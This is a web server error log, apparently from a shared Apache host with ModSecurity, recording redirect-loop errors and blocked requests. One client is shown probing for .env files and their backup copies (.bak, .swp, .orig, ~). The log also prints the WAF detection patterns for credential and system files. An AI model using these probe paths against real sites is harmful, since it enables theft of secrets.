[Tue May 26 14:19:58.331631 2026] [core:error] [pid 606909:tid 607162] [client 5.255.121.146:33938] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 14:19:58.331647 2026] [core:error] [pid 606909:tid 607162] [client 5.255.121.146:33938] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 14:19:58.336034 2026] [core:error] [pid 606909:tid 607102] [client 5.255.121.146:34132] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 14:19:58.336046 2026] [core:error] [pid 606909:tid 607102] [client 5.255.121.146:34132] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 14:19:58.336085 2026] [core:error] [pid 606909:tid 607100] [client 5.255.121.146:34154] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 14:19:58.336095 2026] [core:error] [pid 606909:tid 607100] [client 5.255.121.146:34154] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 14:19:58.336436 2026] [core:error] [pid 606909:tid 607113] [client 5.255.121.146:34068] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 14:19:58.336450 2026] [core:error] [pid 606909:tid 607113] [client 5.255.121.146:34068] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 14:19:58.355275 2026] [core:error] [pid 606909:tid 607132] [client 5.255.121.146:34032] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 14:19:58.355413 2026] [core:error] [pid 606909:tid 607132] [client 5.255.121.146:34032] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 14:19:58.356809 2026] [core:error] [pid 606909:tid 607119] [client 5.255.121.146:34164] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 14:19:58.356966 2026] [core:error] [pid 606909:tid 607119] [client 5.255.121.146:34164] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 14:19:58.357372 2026] [core:error] [pid 606909:tid 607107] [client 5.255.121.146:34130] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 14:19:58.357383 2026] [core:error] [pid 606909:tid 607107] [client 5.255.121.146:34130] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 14:19:58.358283 2026] [core:error] [pid 606909:tid 607137] [client 5.255.121.146:34046] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 14:19:58.358431 2026] [core:error] [pid 606909:tid 607137] [client 5.255.121.146:34046] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 14:19:58.358728 2026] [core:error] [pid 606909:tid 607135] [client 5.255.121.146:34018] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 14:19:58.358728 2026] [core:error] [pid 606909:tid 607118] [client 5.255.121.146:34128] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 14:19:58.358873 2026] [core:error] [pid 606909:tid 607135] [client 5.255.121.146:34018] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 14:19:58.358882 2026] [core:error] [pid 606909:tid 607118] [client 5.255.121.146:34128] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 14:19:58.359664 2026] [core:error] [pid 606909:tid 607108] [client 5.255.121.146:34064] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 14:19:58.359676 2026] [core:error] [pid 606909:tid 607108] [client 5.255.121.146:34064] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 14:19:58.359219 2026] [core:error] [pid 606909:tid 607133] [client 5.255.121.146:34138] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 14:19:58.359703 2026] [core:error] [pid 606909:tid 607133] [client 5.255.121.146:34138] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 14:19:58.359763 2026] [core:error] [pid 606909:tid 607138] [client 5.255.121.146:34112] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 14:19:58.359799 2026] [core:error] [pid 606909:tid 607138] [client 5.255.121.146:34112] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 14:19:58.364238 2026] [core:error] [pid 606909:tid 607127] [client 5.255.121.146:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 14:19:58.364315 2026] [core:error] [pid 606909:tid 607127] [client 5.255.121.146:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 14:19:58.364705 2026] [core:error] [pid 606909:tid 607088] [client 5.255.121.146:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 14:19:58.364734 2026] [core:error] [pid 606909:tid 607088] [client 5.255.121.146:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 14:19:58.369660 2026] [core:error] [pid 606909:tid 607128] [client 5.255.121.146:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 14:19:58.369674 2026] [core:error] [pid 606909:tid 607128] [client 5.255.121.146:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 14:19:58.398932 2026] [security2:error] [pid 606909:tid 607080] [client 5.255.121.146:33966] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "cpcalendars.shahvishaal.com"] [uri "/___proxy_subdomain_cpcalendars/app/.env"] [unique_id "ahVetl0yRtX9qA7aVUVH8AAAAK4"]
[Tue May 26 14:19:58.573825 2026] [security2:error] [pid 606909:tid 607147] [client 57.141.2.17:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVetl0yRtX9qA7aVUVHyQAAAPE"]
[Tue May 26 14:19:58.596849 2026] [security2:error] [pid 606909:tid 607129] [client 5.255.121.146:33946] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "cpcalendars.shahvishaal.com"] [uri "/___proxy_subdomain_cpcalendars/.env"] [unique_id "ahVetl0yRtX9qA7aVUVH9AAAAN8"]
[Tue May 26 14:19:58.787031 2026] [core:error] [pid 606909:tid 607097] [client 5.255.121.146:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 14:19:58.787048 2026] [core:error] [pid 606909:tid 607097] [client 5.255.121.146:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 14:19:59.184039 2026] [security2:error] [pid 606909:tid 607105] [client 5.255.121.146:33966] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.copy$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1269"] [id "390586"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .copy)"] [severity "CRITICAL"] [hostname "cpcalendars.shahvishaal.com"] [uri "/___proxy_subdomain_cpcalendars/.env.production.copy"] [unique_id "ahVet10yRtX9qA7aVUVIDQAAAMc"]
[Tue May 26 14:19:59.188093 2026] [security2:error] [pid 606909:tid 607057] [client 185.191.171.10:48686] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/tag/july-21-25/list/"] [unique_id "ahVet10yRtX9qA7aVUVIEQAAAJc"]
[Tue May 26 14:19:59.188176 2026] [security2:error] [pid 606909:tid 607057] [client 185.191.171.10:48686] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/tag/july-21-25/list/"] [unique_id "ahVet10yRtX9qA7aVUVIEQAAAJc"]
[Tue May 26 14:19:59.191663 2026] [core:error] [pid 606909:tid 607102] [client 5.255.121.146:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 14:19:59.191676 2026] [core:error] [pid 606909:tid 607102] [client 5.255.121.146:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 14:19:59.196480 2026] [core:error] [pid 606909:tid 607163] [client 5.255.121.146:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 14:19:59.196502 2026] [core:error] [pid 606909:tid 607163] [client 5.255.121.146:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 14:19:59.399285 2026] [security2:error] [pid 606909:tid 607055] [client 202.141.30.10:65418] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 10.30.141.202.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVet10yRtX9qA7aVUVIFwAAAJU"]
[Tue May 26 14:19:59.399481 2026] [security2:error] [pid 606909:tid 607055] [client 202.141.30.10:65418] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVet10yRtX9qA7aVUVIFwAAAJU"]
[Tue May 26 14:19:59.503361 2026] [core:error] [pid 606909:tid 607050] [client 5.255.121.146:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 14:19:59.503378 2026] [core:error] [pid 606909:tid 607050] [client 5.255.121.146:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 14:19:59.830940 2026] [security2:error] [pid 606909:tid 607153] [client 5.255.121.146:34460] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "cpcalendars.shahvishaal.com"] [uri "/___proxy_subdomain_cpcalendars/.env.production.bak"] [unique_id "ahVet10yRtX9qA7aVUVIKQAAAPc"]
[Tue May 26 14:19:59.835468 2026] [security2:error] [pid 606909:tid 607045] [client 5.255.121.146:34404] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "cpcalendars.shahvishaal.com"] [uri "/___proxy_subdomain_cpcalendars/.env.production.backup"] [unique_id "ahVet10yRtX9qA7aVUVILAAAAIs"]
[Tue May 26 14:19:59.835809 2026] [security2:error] [pid 606909:tid 607143] [client 5.255.121.146:34390] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.copy$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1269"] [id "390586"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .copy)"] [severity "CRITICAL"] [hostname "cpcalendars.shahvishaal.com"] [uri "/___proxy_subdomain_cpcalendars/.env.local.copy"] [unique_id "ahVet10yRtX9qA7aVUVILgAAAO0"]
[Tue May 26 14:19:59.835867 2026] [security2:error] [pid 606909:tid 607166] [client 5.255.121.146:34378] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.orig$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1266"] [id "390584"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .orig)"] [severity "CRITICAL"] [hostname "cpcalendars.shahvishaal.com"] [uri "/___proxy_subdomain_cpcalendars/.env.local.orig"] [unique_id "ahVet10yRtX9qA7aVUVILQAAAQQ"]
[Tue May 26 14:19:59.836121 2026] [security2:error] [pid 606909:tid 607062] [client 5.255.121.146:34366] ModSecurity: Access denied with code 406 (phase 2). Pattern match "[a-z0-9]~$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1257"] [id "390581"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data Leakage - attempt to access backup file (disable this rule if you require access to files that end with a tilde)"] [severity "CRITICAL"] [hostname "cpcalendars.shahvishaal.com"] [uri "/___proxy_subdomain_cpcalendars/.env.local~"] [unique_id "ahVet10yRtX9qA7aVUVILwAAAJw"]
[Tue May 26 14:19:59.836667 2026] [security2:error] [pid 606909:tid 607147] [client 5.255.121.146:34252] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "cpcalendars.shahvishaal.com"] [uri "/___proxy_subdomain_cpcalendars/.env.bak"] [unique_id "ahVet10yRtX9qA7aVUVIMAAAAPE"]
[Tue May 26 14:19:59.845753 2026] [core:error] [pid 606909:tid 607101] [client 5.255.121.146:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 14:19:59.845771 2026] [core:error] [pid 606909:tid 607101] [client 5.255.121.146:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 14:19:59.846805 2026] [core:error] [pid 606909:tid 607059] [client 5.255.121.146:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 14:19:59.846819 2026] [core:error] [pid 606909:tid 607059] [client 5.255.121.146:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 14:19:59.847155 2026] [core:error] [pid 606909:tid 607109] [client 5.255.121.146:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 14:19:59.847170 2026] [core:error] [pid 606909:tid 607109] [client 5.255.121.146:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 14:19:59.847556 2026] [core:error] [pid 606909:tid 607043] [client 5.255.121.146:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 14:19:59.847572 2026] [core:error] [pid 606909:tid 607043] [client 5.255.121.146:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 14:19:59.853650 2026] [security2:error] [pid 606909:tid 607084] [client 5.255.121.146:34296] ModSecurity: Access denied with code 406 (phase 2). Pattern match "[a-z0-9]~$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1257"] [id "390581"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data Leakage - attempt to access backup file (disable this rule if you require access to files that end with a tilde)"] [severity "CRITICAL"] [hostname "cpcalendars.shahvishaal.com"] [uri "/___proxy_subdomain_cpcalendars/.env~"] [unique_id "ahVet10yRtX9qA7aVUVIOwAAALI"]
[Tue May 26 14:19:59.854191 2026] [security2:error] [pid 606909:tid 607144] [client 5.255.121.146:34340] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "cpcalendars.shahvishaal.com"] [uri "/___proxy_subdomain_cpcalendars/.env.local.backup"] [unique_id "ahVet10yRtX9qA7aVUVIPAAAAO4"]
[Tue May 26 14:19:59.854641 2026] [security2:error] [pid 606909:tid 607115] [client 5.255.121.146:34302] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.orig$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1266"] [id "390584"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .orig)"] [severity "CRITICAL"] [hostname "cpcalendars.shahvishaal.com"] [uri "/___proxy_subdomain_cpcalendars/.env.orig"] [unique_id "ahVet10yRtX9qA7aVUVIPQAAANE"]
[Tue May 26 14:19:59.855596 2026] [security2:error] [pid 606909:tid 607120] [client 5.255.121.146:34442] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sw[a-z]$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1275"] [id "390587"] [rev "5"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .sw)"] [severity "CRITICAL"] [hostname "cpcalendars.shahvishaal.com"] [uri "/___proxy_subdomain_cpcalendars/.env.production.swp"] [unique_id "ahVet10yRtX9qA7aVUVIPgAAANY"]
[Tue May 26 14:19:59.855666 2026] [security2:error] [pid 606909:tid 607154] [client 5.255.121.146:34428] ModSecurity: Access denied with code 406 (phase 2). Pattern match "[a-z0-9]~$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1257"] [id "390581"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data Leakage - attempt to access backup file (disable this rule if you require access to files that end with a tilde)"] [severity "CRITICAL"] [hostname "cpcalendars.shahvishaal.com"] [uri "/___proxy_subdomain_cpcalendars/.env.production~"] [unique_id "ahVet10yRtX9qA7aVUVIQAAAAPg"]
[Tue May 26 14:19:59.857885 2026] [security2:error] [pid 606909:tid 607128] [client 5.255.121.146:34312] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "cpcalendars.shahvishaal.com"] [uri "/___proxy_subdomain_cpcalendars/.env.local.bak"] [unique_id "ahVet10yRtX9qA7aVUVIQQAAAN4"]
[Tue May 26 14:19:59.865113 2026] [security2:error] [pid 606909:tid 607161] [client 5.255.121.146:34398] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "cpcalendars.shahvishaal.com"] [uri "/___proxy_subdomain_cpcalendars/.env.production.old"] [unique_id "ahVet10yRtX9qA7aVUVIRAAAAP8"]
[Tue May 26 14:19:59.866086 2026] [security2:error] [pid 606909:tid 607152] [client 5.255.121.146:34372] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sw[a-z]$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1275"] [id "390587"] [rev "5"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .sw)"] [severity "CRITICAL"] [hostname "cpcalendars.shahvishaal.com"] [uri "/___proxy_subdomain_cpcalendars/.env.local.swp"] [unique_id "ahVet10yRtX9qA7aVUVIRgAAAPY"]
[Tue May 26 14:19:59.866536 2026] [security2:error] [pid 606909:tid 607157] [client 5.255.121.146:34298] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sw[a-z]$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1275"] [id "390587"] [rev "5"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .sw)"] [severity "CRITICAL"] [hostname "cpcalendars.shahvishaal.com"] [uri "/___proxy_subdomain_cpcalendars/.env.swp"] [unique_id "ahVet10yRtX9qA7aVUVIRwAAAPs"]
[Tue May 26 14:19:59.866558 2026] [security2:error] [pid 606909:tid 607096] [client 5.255.121.146:34444] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.orig$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1266"] [id "390584"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .orig)"] [severity "CRITICAL"] [hostname "cpcalendars.shahvishaal.com"] [uri "/___proxy_subdomain_cpcalendars/.env.production.orig"] [unique_id "ahVet10yRtX9qA7aVUVISAAAAL4"]
[Tue May 26 14:19:59.867020 2026] [security2:error] [pid 606909:tid 607129] [client 5.255.121.146:34310] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.copy$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1269"] [id "390586"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .copy)"] [severity "CRITICAL"] [hostname "cpcalendars.shahvishaal.com"] [uri "/___proxy_subdomain_cpcalendars/.env.copy"] [unique_id "ahVet10yRtX9qA7aVUVIRQAAAN8"]
[Tue May 26 14:19:59.867896 2026] [core:error] [pid 606909:tid 607083] [client 5.255.121.146:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 14:19:59.867906 2026] [core:error] [pid 606909:tid 607083] [client 5.255.121.146:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 14:19:59.868799 2026] [security2:error] [pid 606909:tid 607068] [client 5.255.121.146:34238] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "cpcalendars.shahvishaal.com"] [uri "/___proxy_subdomain_cpcalendars/.env.old"] [unique_id "ahVet10yRtX9qA7aVUVISgAAAKI"]
